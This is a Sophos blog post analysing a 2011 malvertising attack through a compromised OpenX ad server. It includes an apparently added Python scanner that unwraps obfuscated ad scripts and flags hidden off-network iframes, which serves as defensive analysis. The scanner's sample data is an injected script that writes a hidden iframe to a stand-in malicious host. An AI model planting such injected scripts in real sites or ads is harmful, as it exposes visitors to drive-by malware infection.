
As we all know, compromised sites play an important role in web distributed malware, acting as the conduit, guiding user traffic to further malicious content. Sometimes, the attackers get lucky, and succeed in compromising a high profile, popular site. Another way to increase the number of users exposed to the attack is to compromise advertising content, thereby exposing all users of any 3rd party sites that happen to load the ads.
Late yesterday evening, we started to see evidence of such an attack – Sophos products were blocking certain ad content as Mal/Iframe-U.

Knowing that detection and what it looked for, I was pretty sure that the ad server of Campus Party was compromised.
Sure enough, I could see that in addition to the desired ads (for the July Campus Party event in Valencia), the content also contained malicious JavaScript (highlighted in yellow):

Not the first time I have seen an OpenX ad-server getting compromised, and I suspect it won’t be the last.
Deobfuscating the JavaScript reveals the payload. As our Mal/Iframe-U detection name suggests, it is an iframe to load further malicious content from a remote server.
This initiates the attack, triggering a chain of events summarised below:
- ad content (pro-actively blocked as Mal/Iframe-U) silently loads content from the attack site.
- the user’s browser and browser plug-ins are inspected to determine the most appropriate exploit content to load. A legitimate library is used for this.
- exploit content (e.g. Mal/HcpExpl-A, Troj/Lifsect-A, Mal/ExpJS-M) is loaded in order to infect the user with malware. At the time of writing, the exploit site is serving up a rootkit which Sophos products detect as Mal/TDSSPack-AX.
As is typically the case for today’s web attacks, all of the script components used are heavily obfuscated in an attempt to thwart detection efforts and hinder analysis.
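To make the chain above concrete from the defender's side, here is an added example (not Sophos's detection logic, and not the script taken from the compromised ad server) that statically unwraps two common obfuscation wrappers seen in injected ad scripts, `unescape("%3C...")` and `String.fromCharCode(...)`, and then flags any iframe whose source points off the ad network's own hosts, noting whether it is sized or styled to be invisible. The sample ad markup and the hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample of an ad-server response: a genuine banner plus an injected
# script that document.write()s a hidden 1x1 iframe through unescape(). The
# hostnames are invented; this is not the script from the compromised server.
SAMPLE_AD_HTML = """
<div class="ad"><a href="https://ads.example.test/click?id=42">
<img src="https://ads.example.test/banner.png"></a></div>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example.test%2Fin.cgi%3F3%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));</script>
"""

UNESCAPE_RE = re.compile(r'unescape\("((?:%[0-9A-Fa-f]{2}|[^"\\])*)"\)')
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")

def deobfuscate(src: str) -> str:
    """Statically unwrap unescape("%3C...") and String.fromCharCode(60,...)
    layers, repeating until nothing changes, since wrappers are often nested.
    Only %XX sequences are handled, not JavaScript's %uXXXX form."""
    prev = None
    while prev != src:
        prev = src
        src = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), src)
        src = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
            src)
    return src

def suspicious_iframes(ad_html: str, first_party_hosts: set) -> list:
    """Flag iframes whose src leaves the ad network's own hosts, noting whether
    the frame is sized or styled to be invisible (1x1, hidden, display:none)."""
    findings = []
    for tag in IFRAME_RE.finditer(deobfuscate(ad_html)):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag.group(0))}
        host = urlparse(attrs.get("src", "")).hostname or ""
        if host and host not in first_party_hosts:
            style = attrs.get("style", "").replace(" ", "").lower()
            tiny = attrs.get("width") in {"0", "1"} or attrs.get("height") in {"0", "1"}
            hidden = "hidden" in style or "display:none" in style
            findings.append({"host": host, "hidden": tiny or hidden, "tag": tag.group(0)})
    return findings

if __name__ == "__main__":
    for f in suspicious_iframes(SAMPLE_AD_HTML, {"ads.example.test"}):
        print(f"off-network iframe to {f['host']} (hidden={f['hidden']}): {f['tag']}")
```

Run against a feed of ad-server responses, a single off-network hidden iframe like the one flagged here is the kind of injected content worth alerting on; real samples add more layers, so the unwrapping step is where this scanner needs extending.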
We have already informed those at Campus Party about this issue in order that they can get the malvertising attack cleaned up as soon as possible. In fact, as I type, I can see that the ad server is already offline, presumably whilst they resolve the issue. Kudos to them for actioning this quickly!
As to the root cause of the compromise, I do not know exactly how the server was compromised. However, given history, my money would be on an out-of-date or unpatched version of OpenX.
Posted on 29 April 2011. Tags: HackingTheWeb, malvertising, Malware, rootkit, SophosLabs, TDSS, Threats, Web
The above information is reprinted from and copyrighted © by Naked Security - Sophos.